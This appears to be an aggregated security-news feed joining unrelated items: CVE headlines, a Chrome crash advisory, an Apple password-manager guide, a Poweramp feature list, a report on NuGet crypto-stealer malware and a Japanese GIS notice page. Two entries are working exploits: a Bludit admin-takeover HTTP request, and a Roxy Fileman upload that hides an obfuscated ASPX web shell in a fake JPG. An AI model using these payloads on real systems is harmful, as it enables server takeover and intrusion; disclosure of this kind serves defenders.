Microsoft Edge (Chromium-based) Spoofing Vulnerability

CVE-2023-24935

Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability

CVE-2023-28284

Fatal OOM/crash of Chrome browser while detaching/attaching tabs on macOS.

Title: Google Chrome Browser 111.0.5563.64 AXPlatformNodeCocoa Fatal OOM/Crash (macOS)  
Advisory ID: ZSL-2023-5770  
Type: Local  
Impact: DoS  
Risk: (3/5)  
Release Date: 11.04.2023

**Summary**

Google Chrome browser is a free web browser used for accessing the internet and running web-based applications. The Google Chrome browser is based on the open source Chromium web browser project. Google released Chrome in 2008 and issues several updates a year.

**Description**

Fatal OOM/crash of Chrome browser while detaching/attaching tabs on macOS.

**Vendor**

Google LLC - https://www.google.com

**Affected Version**

111.0.5563.64 (Official Build) (x86\_64)  
110.0.5481.100 (Official Build) (x86\_64)  
108.0.5359.124 (Official Build) (x86\_64)  
108.0.5359.98 (Official Build) (x86\_64)

**Tested On**

macOS 12.6.1 (Monterey)  
macOS 13.3.1 (Ventura)

**Vendor Status**

\[08.12.2022\] Vulnerability discovered.  
\[13.12.2022\] Contact with the vendor, ticket 1400682 created.  
\[13.12.2022\] Vendor begins investigation.  
\[10.04.2023\] Vendor releases version 112.0.5615.49 to address this issue.  
\[11.04.2023\] Public security advisory released.

**PoC**

google\_chrome\_oom.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

\[1\] https://bugs.chromium.org/p/chromium/issues/detail?id=1400682  
\[2\] https://chromium-review.googlesource.com/c/chromium/src/+/3861171

**Changelog**

\[11.04.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Google Chrome Browser 111.0.5563.64 AXPlatformNodeCocoa Fatal OOM/Crash (macOS)

Bludit version 4.0.0-rc-2 suffers from an account takeover vulnerability due to an API key that can be abused to change the administrative password.

    ## Title: Bludit-4.0.0-rc-2 - Release candidate 2 Account takeover:API token vulnerability## Author: nu11secur1ty## Date: 04.11.2013## Vendor: https://www.bludit.com/## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit## Description:The already authenticated attacker can send a normal request to changehis password and then he can usethe same JSON `object` and the vulnerable `API token KEY` in the samerequest to change the admin account password.Then he can access the admin account and he can do very malicious stuff.STATUS: HIGH Vulnerability[+]Exploit:```PUTPUT /api/users/admin HTTP/1.1Host: 127.0.0.1:8000Content-Length: 138sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50Safari/537.36content-type: application/jsonAccept: */*Origin: http://127.0.0.1:8000Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1:8000/admin/edit-user/pwnedAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthuiConnection: close{"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"}```[+]Response:```HTTPHTTP/1.1 200 OKHost: 127.0.0.1:8000Date: Tue, 11 Apr 2023 08:33:51 GMTConnection: closeX-Powered-By: PHP/7.4.30Access-Control-Allow-Origin: *Content-Type: application/json{"status":"0","message":"User edited.","data":{"key":"admin"}}```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2)## Proof and Exploit:[href](https://streamable.com/w3aa4d)## Time spend:00:57:00

Bludit 4.0.0-rc-2 Privilege Escalation

Your iPhone, iPad, and Mac now have a built-in password feature, complete with two-factor authentication.

Most people don't use a password manager or two-factor authentication—even people who know it's a good idea—because installing and managing _yet another app_ just sounds exhausting. Well, if you're an Apple user, you don't need another app anymore: Your device can manage your passwords and generate two-factor authentication codes for you, and you can even sync them with a Windows computer.

Password managers are important. Why? To quickly summarize, using the same password for every website and app is an open invitation for hackers to access all of your accounts. That's because passwords regularly leak, and a leaked password on one site can give hackers access to all your other accounts if you use the same password everywhere. It's best, then, to use a totally different password on every site, but no human being can remember that many passwords.

Password managers are the best solution we have at the moment, because they can generate, and then store, secure passwords for all of your services. Most people don't use one, though, because such apps can be complicated to learn, and the best ones aren't free.

So it's great that Apple offers such functionality. But there's a downside: It's a little buried, if not outright hidden. Still, if you're a Safari user with multiple Apple devices, this feature means you can quickly generate and save secure passwords for all of your accounts. Here's how. Note that you'll need a (free) iCloud account for this service to sync passwords between devices, though if you're an Apple user you almost certainly already have one.

Create Passwords

To get started, you may need to enable the feature, which you can find in System Settings on your device under **Passwords**. Make sure **iCloud Keychain** is turned on. Windows users should also install iCloud for Windows, which can sync your passwords with Chrome or Microsoft Edge.

The simplest way to add passwords to Apple's hidden password manager is to just start using your devices and saving passwords as you go. When you sign into any online account in Safari, or in any app on your iPhone or iPad, there's generally a pop-up asking if you want to save the password in your **iCloud Keychain for AutoFill.** This is the simplest way to add accounts: Just hit the **Save Password** button and your username and password will be saved.

Alternatively, if you're signing up for a new account, you will generally be offered an automatically generated strong password—if not, you can tap the key icon at the top of the keyboard on mobile or in the right side of the password field on desktop. Either way you should see the **Add New Password** option, which can automatically create a strong password for you.

From now on, when you log in to the site, your device will offer to fill out the username and password for you. It will generally use TouchID, FaceID, or your system password to confirm you identity, after which the username and password field will be filled in. This saves you from having to remember the passwords, and even the usernames, you use to log in to websites.

Browse and Edit Your Passwords

You might be wondering _where_, exactly, all of these passwords are saved. Let's head back to **Passwords** in System Settings. Here you will find a list of all the passwords you've saved.

Apple via Justin Pot

At the top of the list is a **Security Recommendations** function, which will cross-reference your saved passwords with known lists of leaked accounts. This is a useful way to know if any of your passwords absolutely need to be changed.

Below that is a search bar, which you can use to quickly find any account. Open an account to see the username, password, and URLs associated with the account. You can also add a note to any account, if you want.

Two-Factor Authentication

We've talked about how two-factor authentication keeps you more secure, but basically it means that a hacker who gets your password won't be able to log in unless they _also_ have physical access to your device. Generally two-factor authentication requires installing _yet another_ app, for generating codes, but Apple devices have this feature built in, and they can even fill in the field for you.

Head back to your list of passwords in the System Settings app. Open any account and you'll see a **Set Up Verification Code** field.

Apple via Justin Pot

Tap this and you can set up two-factor authentication for the application. How to do this depends on the specific service you're setting it up for, but it's generally in the settings of the specific app or website. You'll have a QR code to sign or, alternatively, a long code to copy.

Apple via Justin Pot

After setting this up, your Apple device will automatically offer verification codes for you every time you log in to the service on any of your devices. It's really slick, and it's a lot faster than applications like Authy or Google Authenticator.

Importing and Exporting Passwords

Note that if you have an existing password manager, you can import your passwords to Apple's system. Head back to **Passwords** in the settings app and hit the three-dot button on the right above your list of passwords. Here you will see the option to **Import passwords**.

Apple via Justin Pot

You will need to export your passwords to a CSV file before you can use this functionality. Here are instructions for the leading password managers:

*   1Password
*   LastPass
*   Bitwarden
*   Dashlane
*   Google Chrome

You can also **Export** your Apple passwords to a CSV file from here, allowing you to import them into one of these password managers. We've outlined  the best password managers for you; my personal recommendations are Bitwarden, which is free and open source, and 1Password, which is powerful and free to use.

There's not a lot of reason for the Apple faithful to do this, though. As we've outlined, Apple's password system does most of what these applications can do. The main problem is that they're hidden. 

Recently the blogger Cabel Sasser argued that Apple Passwords needs an app, which is part of why I wrote this guide. I'm not sure if I agree with his premise—I suspect most people would simply ignore any “Passwords” app, the way they ignore most applications that come bundled with their devices. Still, it is true that all of this functionality is pretty buried. I hope this article helps you find it.

How to Use Apple’s New All-In-One Password Manager

An issue found in POWERAMP audioplayer build 925 bundle play and build 954 allows a remote attacker to gain privileges via the reverb and EQ preset parameters.

**Key Features**

*   Audio Engine
    *   plays mp3, mp4/m4a/alac/aac, ogg, opus, wma, flac, wav, ape, wv, tta, mpc, aiff, dsd (dff/dsf), mka, mpga, tak, flv (audio), and other formats
    *   optimized graphical equalizer: 5-32 bands, presets, custom and audio device assignable presets
    *   parametric equalizer: each band added and configured manually
        *   Low Pass/High Pass, Low Shelf/High Shelf, Band Pass, Peaking Band filters
    *   powerful Bass and Treble adjustment
    *   stereo expansion, mono mixing, balance
    *   tempo control, reverb effect
    *   Float32 internal sample format, Float64 DSP processing, up to 384 kHz sampling rate, selectable SWR/SoX resampler, multiple dither options, various per-output settings
    *   Hi-Res Output (where supported by the device)
    *   unique Direct Volume Control (DVC) for the extended dynamic range and deep bass
    *   crossfade
    *   gapless
    *   replay gain
    *   30/50/100+ volume levels (Android 5-11), SoundAssistant 150 levels support
    *   audio info with the detailed audio processing information
    *   AutoEQ .txt preset importing
*   User Interface
    *   visual themes, 3rd party skin support with the skin options as defined by skin Author
    *   spectrum and .milk compatible visualizations
    *   album art downloading, including high resolution album art formats; artist images downloading and per-category user-selectable images
    *   highly configurable widget types
    *   lock screen options
    *   sleep timer
*   Library and Folders
    *   plays songs from from own categorized Library or Folders (flat or hierarchy)
    *   optional dynamic Queue category
    *   advanced Shuffle and Repeat modes
        *   Shuffle Songs, Categories
        *   Shuffle Randomization options (Less random..Full Random)
    *   embed and standalone .CUE files support
    *   support for m3u, m3u8, pls, wpl playlists, m3u8 playlist exporting
    *   multiple Artists, Album Artists, Composers per track support
        *   with configurable split characters
    *   tag editor
*   Android Auto support
*   Google Assistant support
*   casting to Chromecast-enabled devices
*   http streaming via imported m3u8 or user created playlists
*   headset support, automatic Resume on headset and/or BT connection options
*   lyrics support, embedded lyrics and multiple 3rd party lyrics search apps supported
*   high level of customization via settings
*   open Poweramp API
*   works on any Android starting from 5+
*   settings/data export and import
*   constantly updated with the new features and support for the new Android versions
*   localized to 30 languages

**Download 15 days Trial:**

*   Google Play
*   This site (.apk)

**Try new beta releases:**

*   Poweramp new releases

CVE-2023-27645: Poweramp – Music Player for Android

Cybersecurity researchers have detailed the inner workings of the cryptocurrency stealer malware that was distributed via 13 malicious NuGet packages as part of a supply chain attack targeting .NET developers.
The sophisticated typosquatting campaign, which was detailed by JFrog late last month, impersonated legitimate packages to execute PowerShell code designed to retrieve a follow-on binary

Software Security / Cryptocurrency

Cybersecurity researchers have detailed the inner workings of the cryptocurrency stealer malware that was distributed via 13 malicious NuGet packages as part of a supply chain attack targeting .NET developers.

The sophisticated typosquatting campaign, which was detailed by JFrog late last month, impersonated legitimate packages to execute PowerShell code designed to retrieve a follow-on binary from a hard-coded server.

The two-stage attack culminates in the deployment of a .NET-based persistent backdoor, called Impala Stealer, which is capable of gaining unauthorized access to users' cryptocurrency accounts.

"The payload used a very rare obfuscation technique, called '.NET AoT compilation,' which is a lot more stealthy than using 'off the shelf' obfuscators while still making the binary hard to reverse engineer," JFrog told The Hacker News in a statement.

.NET AoT compilation is an optimization technique that allows apps to be ahead-of-time compiled to native code. Native AOT apps also have faster startup time and smaller memory footprints, and can run on a machine without .NET runtime installed.

The second-stage payload comes with an auto-update mechanism that enables it to retrieve new versions of the executable from a remote location. It further achieves persistence by injecting JavaScript code into Discord or Microsoft Visual Studio Code apps, thereby activating the launch of the stealer binary.

The binary then proceeds to search for the installation of the Exodus Wallet desktop application and inserts JavaScript code into various HTML files in order to harvest and exfiltrate sensitive data to a hard-coded Discord webhook.

The JavaScript snippet, for its part, is fetched from an online paste website from where it's already been deleted. That said, it's suspected that the code may have been used to steal user credentials and access other information of interest.

"The bad actors used typosquatting techniques to deploy a custom malicious payload \[...\] which targets the Exodus crypto wallet and leaks the victim's credentials to cryptocurrency exchanges, by using code injection," Shachar Menashe, senior director at JFrog Security Research, said.

UPCOMING WEBINAR

Learn to Secure the Identity Perimeter - Proven Strategies

Improve your business security with our upcoming expert-led cybersecurity webinar: Explore Identity Perimeter strategies!

Don't Miss Out – Save Your Seat!

"Our investigation proves no open source software repository is completely trust-worthy, so safety measures should be taken at every step of the software development lifecycle to ensure the software supply chain remains secure."

The findings come as Phylum unearthed a malicious npm package named mathjs-min that was uploaded to the repository on March 26, 2023, and found to harbor a credential stealer that grabs Discord passwords from the official app as well as web browsers like Google Chrome, Brave, and Opera.

"This package is actually a modified version of the widely used Javascript math library mathjs, and was injected with malicious code after being forked," the software supply chain security firm said. "The modified version was then published to NPM with the intention of passing it off as a minified version of the genuine mathjs library."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

 Cryptocurrency Stealer Malware Distributed via 13 NuGet Packages

National land numerical information data conversion tool all versions improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the PC may be accessed by an attacker.

_stop_2023/04/10

国土数値情報・位置参照情報データ公開のお知らせ

令和４年度に作成・更新した下記のデータについて令和５年５月～６月にかけて公開いたします。  
（公開予定データ・順不同）  
土地利用３次メッシュ、土地利用細分メッシュ、都市地域土地利用細分メッシュ、土地利用詳細メッシュ（土地利用メッシュデータ公開範囲：北陸、関東、中部）  
行政区域、国・都道府県機関、市町村役場等及び公的集会施設、  
洪水浸水想定区域、土砂災害警戒区域、津波浸水想定、高潮浸水想定区域、雨水出水浸水想定区域、  
高速道路時系列、バス停留所、バスルート、鉄道、鉄道時系列、駅別乗降客数  
位置参照情報

_stop_2023/03/31

国土数値情報データ変換ツールの提供停止について

国土数値情報ダウンロードサイトにて提供してきた『国土数値情報データ変換ツール』に、  
XML外部エンティティ参照の不適切な制限の脆弱性(CWE-611)が判明したため提供を停止しました。  
過去に、当該ツールをダウンロードしているご利用者におかれましては、当該ツールの利用停止・削除を実施いただくようお願い申し上げます。  
詳しくはこちらをご覧ください。

_stop_2023/03/24

システムのメンテナンスに伴うホームページの運営について

2023年3月28日（火）14:00～16:30にシステムのメンテナンスを行います（進捗状況により延長する可能性があります。）。  
そのため、メンテナンス中は、GISホームページへのアクセスが断続的に出来なくなります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いします。

_stop_2022/11/28

システムのメンテナンスに伴うホームページの運営について

2022年12月1日（木）14:00～17:00、及び2022年12月2日（金）14:00～15:00にシステムのメンテナンスを行います。  
そのため、メンテナンス中は、GISホームページへのアクセスが断続的に出来なくなります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いします。

_stop_2022/9/14

ビジネスアイデアコンテスト『イチBizアワード』開催

内閣官房主催「地理空間情報」を活用したビジネスアイデアコンテスト『イチBizアワード』の公募が、2022年7月19日より開始しており、2022年9月30日（金）18:00まで受付中とのことです。本コンテストについて内閣官房よりメッセージが届いておりますので紹介いたします。  
なお、応募方法や詳細については、公式サイトをご覧ください。  
https://www.g-idea.go.jp/

（内閣官房のメッセージ）  
内閣官房では地理空間情報のポテンシャルを最大限活かした新しいサービスビジネスが生まれ、発展することで、よりよい社会や生活を実現し未来を切り開きたい、という思いで『イチBizアワード』を企画いたしました。  
『イチBizアワード』では、「いつ、どこで、何が、どのような状態か」といった、位置や時間に関する情報を活用したものであれば、どんなアイデアでも自由にご応募いただけます。  
既にあるビジネスアイデアやこんなサービスがあったらいいなという、ちょっとしたアイデアまで、沢山のアイデアの応募をお待ちしています。  
応募いただいたアイデアは、専門知識や発信力をもつ審査員に審査いただき、「事業化部門」「マッチング部門」「ちょっとしたサービスアイデア部門」の３つの部門で表彰します。  
加えて協賛企業とのマッチングの機会もあり、実現に向けて後押しします。 奮ってのご応募をお待ちしております。

_stop_2022/8/9

システムのメンテナンスに伴うホームページの運営について

2022年8月17日（水）14:00～17:00にシステムのメンテナンスを行います（進捗状況により延長する可能性があります。）。  
そのため、メンテナンス中は、GISホームページへのアクセスが断続的にできなくなることがあります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いいたします。

_stop_2022/07/05

システムのメンテナンスに伴うホームページの運営について

2022年7月7日（木）13:00～15:30、及び2022年7月8日（金）15:30～16:30にシステムのメンテナンスを行います（進捗状況により延長する可能性があります。）。  
そのため、メンテナンス中は、GISホームページへのアクセスが断続的にできなくなることがあります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いいたします。

_stop_2022/06/06

システムのメンテナンスに伴うホームページの運営について

2022年6月9日（木）16:00～17:30にシステムのメンテナンスを行います（進捗状況により延長する可能性があります。）。  
そのため、メンテナンス中は、GISホームページへのアクセスが断続的にできなくなることがあります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いいたします。

_stop_2022/03/28

システムのメンテナンスに伴うホームページの運営について

2022年3月30日（水）17:00～18:00にシステムのメンテナンスを行います（進捗状況により延長する可能性があります。）。  
そのため、メンテナンス中は、GISホームページへのアクセスが出来なくなります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いします。

_stop_2022/03/24

利用者アンケートを開設しました

当サイトへの感想やご意見を募集するアンケートを開設しました。画面左メニューの「利用者アンケート」からご回答いただけます。  
ご回答いただました内容は今後のサイト運営に役立てて参りますので、是非ご協力の程よろしくお願いいたします。

_stop_2022/03/23

システムのメンテナンスに伴うホームページの運営について

2022年3月25日（金）18:00～18:10にシステムのメンテナンスを行います（進捗状況により延長する可能性があります。）。  
そのため、メンテナンス中は、GISホームページへのアクセスが断続的に出来なくなります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いします。

_stop_2022/02/22

位置参照情報ページについて

本日14:00頃、位置参照情報ページが復旧いたしました。  
利用者の皆さまには大変ご迷惑をおかけしました。今後ともよろしくお願いします。

_stop_2022/02/19

システムのメンテナンスに伴うホームページの運営について

GISホームページは、現在、メンテナンス中でホームページに断続的にアクセスができなくなることがあります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いします。

_stop_2022/02/18

システムのメンテナンスに伴うホームページの運営について

2022年2月24日（木）15:00～15:10にシステムのメンテナンスを行います。  
そのため、メンテナンス中は、GISホームページへのアクセスが断続的に出来なくなります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いします。

_stop_2022/02/14

システムのメンテナンスに伴うホームページの運営について

2022年2月18日（金）18:30～19:30にシステムのメンテナンスを行います（進捗状況により延長する可能性があります。）。  
そのため、メンテナンス中は、GISホームページへのアクセスが断続的に出来なくなります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いします。

_stop_2021/11/10

システムのメンテナンスに伴うホームページの運営について

2021年11月13日（土）9:00～10:00にシステムのメンテナンスを行います（進捗状況により延長する可能性があります。）。  
そのため、メンテナンス中は、GISホームページへのアクセスが断続的に出来なくなります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いします。

_stop_2021/01/12

システムのメンテナンスに伴うホームページの運営について

2021年1月15日（金）にシステムのメンテナンスを行います。  
それに伴い、よりセキュリティが強固な設定となり、セキュリティが弱い暗号化を使用しているブラウザからは接続できなくなります。  
閲覧できない場合は、現在ご利用のMicrosoft Edge、Mozilla Firefox、Google Chromeが最新のバージョンかご確認いただき、最新のバージョンへアップデートをお願いいたします。

_stop_2020/12/12

三大都市圏計画区域データ PDF･KMLダウンロードページ開設のお知らせ

こちらに 国土数値情報 三大都市圏計画区域 データから作成した、PDF･KMLファイルのダウンロードページを開設しました。

_stop_2020/07/07

ウェブマッピング調整中のお知らせ　（対応完了しました）

ウェブマッピングシステムは、現在データセットを準備中です。準備ができ次第、順次公開いたします。  
国土数値情報データの内容を確認するには、GISをご利用になるか、geojson形式のファイルをご利用ください。

_stop_2020/07/01

GISホームページ業務移管のお知らせ

令和２年度の国土交通省の組織改編に伴い7月1日よりGISホームページは以下の局に移管となります。  
国土数値情報・位置参照情報　不動産・建設経済局  
国土調査（土地分類調査・水調査）　国土政策局

_stop_2020/06/30

国土数値情報閲覧マニュアル公開のお知らせ

国土数値情報閲覧マニュアル（QGIS）、Geojsonデータ閲覧マニュアルの公開を開始いたしました。  
こちらからダウンロードの上、ご活用ください。  
（現在、ウェブマッピングシステムは調整中になっております。国土数値情報データの内容確認にはこちらのマニュアルをご活用ください。）

_stop_2020/05/18

【重要】GISホームページのリニューアルのお知らせ

2020/05/18よりGISホームページをリニューアルしました。  
なお、一部のデータについては、今後今月末を目処に順次登録して参りますので、データが登録されるまで今しばらくお待ち願います。

（2020/05/22追記）  
GISホームページで対応するブラウザは以下のとおりです。  
対応ブラウザ以外をご利用された場合、画面が正しく表示されない場合がございます。  
Microsoft Edge （最新版）、Mozilla Firefox （最新版）、Google Chrome （最新版）  
ご不明な点などがございましたら、以下の問い合わせ窓口までご連絡願います。  
国土数値情報問合せ受付け窓口　：shitsumon@ksjask.info

CVE-2023-25955: お知らせ

Roxy Fileman versions 1.4.5 and below for .NET suffer from a remote shell upload vulnerability.

    # Exploit Title: Roxy Fileman 1.4.5 For .NET Arbitrary File Upload# Date: 09/04/2023# Exploit Author: Zer0FauLT [admindeepsec@proton.me]# Vendor Homepage: roxyfileman.com# Software Link: https://web.archive.org/web/20190317053437/http://roxyfileman.com/download.php?f=1.4.5-net# Version: <= 1.4.5# Tested on: Windows 10 and Windows Server 2019# CVE : 0DAY###########################################################################################                First, we upload the .jpg shell file to the server.                     ###########################################################################################POST /admin/fileman/asp_net/main.ashx?a=UPLOAD HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 666Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygOxjsc2hpmwmISeJSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="action"upload------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="method"ajax------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="d"/Upload/PenTest------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="files[]"; filename="test.jpg"Content-Type: image/jpegâ€°PNG<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %><%var PAY:String=Request["\x61\x62\x63\x64"];eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");%>------WebKitFormBoundarygOxjsc2hpmwmISeJ--###########################################################################################   In the second stage, we manipulate the .jpg file that we uploaded to the server.     ###########################################################################################{"FILES_ROOT":          "","RETURN_URL_PREFIX":   "","SESSION_PATH_KEY":    "","THUMBS_VIEW_WIDTH":   "140","THUMBS_VIEW_HEIGHT":  "120","PREVIEW_THUMB_WIDTH": "300","PREVIEW_THUMB_HEIGHT":"200","MAX_IMAGE_WIDTH":     "1000","MAX_IMAGE_HEIGHT":    "1000","INTEGRATION":         "ckeditor","DIRLIST":             "asp_net/main.ashx?a=DIRLIST","CREATEDIR":           "asp_net/main.ashx?a=CREATEDIR","DELETEDIR":           "asp_net/main.ashx?a=DELETEDIR","MOVEDIR":             "asp_net/main.ashx?a=MOVEDIR","COPYDIR":             "asp_net/main.ashx?a=COPYDIR","RENAMEDIR":           "asp_net/main.ashx?a=RENAMEDIR","FILESLIST":           "asp_net/main.ashx?a=FILESLIST","UPLOAD":              "asp_net/main.ashx?a=UPLOAD","DOWNLOAD":            "asp_net/main.ashx?a=DOWNLOAD","DOWNLOADDIR":         "asp_net/main.ashx?a=DOWNLOADDIR","DELETEFILE":          "asp_net/main.ashx?a=DELETEFILE","MOVEFILE":            "asp_net/main.ashx?a=MOVEFILE","COPYFILE":            "asp_net/main.ashx?a=COPYFILE","RENAMEFILE":          "asp_net/main.ashx?a=RENAMEFILE","GENERATETHUMB":       "asp_net/main.ashx?a=GENERATETHUMB","DEFAULTVIEW":         "list","FORBIDDEN_UPLOADS":   "zip js jsp jsb mhtml mht xhtml xht php phtml php3 php4 php5 phps shtml jhtml pl sh py cgi exe application gadget hta cpl msc jar vb jse ws wsf wsc wsh ps1 ps2 psc1 psc2 msh msh1 msh2 inf reg scf msp scr dll msi vbs bat com pif cmd vxd cpl htpasswd htaccess","ALLOWED_UPLOADS":     "bmp gif png jpg jpeg","FILEPERMISSIONS":     "0644","DIRPERMISSIONS":      "0755","LANG":                "auto","DATEFORMAT":          "dd/MM/yyyy HH:mm","OPEN_LAST_DIR":       "yes"}#############################################################################################################################################################################################################################   We say change the file name and we change the relevant "asp_net/main.ashx?a=RENAMEFILE" parameter with the "asp_net/main.ashx?a=MOVEFILE" parameter and manipulate the paths to be moved on the server as follows.     #############################################################################################################################################################################################################################POST /admin/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 44Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx===========================================================================================================================================================================================================================POST /admin/fileman/asp_net/main.ashx?a=MOVEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 68Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx###########################################################################################                                 and it's done!                                         ###########################################################################################HTTP/2 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Vary: Accept-EncodingServer: Microsoft-IIS/10.0X-Aspnet-Version: 4.0.30319X-Powered-By-Plesk: PleskWinDate: Sun, 09 Apr 2023 09:49:34 GMTContent-Length: 21{"res":"ok","msg":""}=============================================================================================

Roxy Fileman 1.4.5 Shell Upload

Chrome suffers from a heap buffer overflow vulnerability in base::SampleVectorBase::MoveSingleSampleToCounts.

Tag

#chrome